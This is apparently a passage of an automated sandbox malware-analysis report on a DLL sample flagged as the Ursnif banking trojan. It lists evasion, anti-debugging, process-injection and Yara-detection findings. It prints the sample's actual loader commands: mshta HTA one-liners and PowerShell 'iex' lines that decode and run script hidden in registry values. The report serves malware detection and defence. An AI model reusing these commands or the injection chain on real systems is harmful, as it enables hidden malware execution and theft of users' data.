Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2390
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5598
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1463
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5044 Thread sleep time: -1667865539s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604 Thread sleep count: 1514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604 Thread sleep count: 1463 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_04639F9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_0462F8CE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462FD33 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 3_2_0462FD33
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: mshta.exe, 00000023.00000003.856754934.0000025397C3B000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}J
Source: mshta.exe, 00000031.00000003.892638496.0000023B71221000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 0000002D.00000003.880596197.000002732AA5F000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress, 0_2_10001BAC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04637EA1 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_04637EA1

HIPS / PFW / Operating System Protection Evasion:

barindex
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5512
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF694A512E0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04622239 cpuid 3_2_04622239
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_046217C3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 3_2_046217C3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001456 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001456
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0464104F RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_0464104F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_10001F0E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif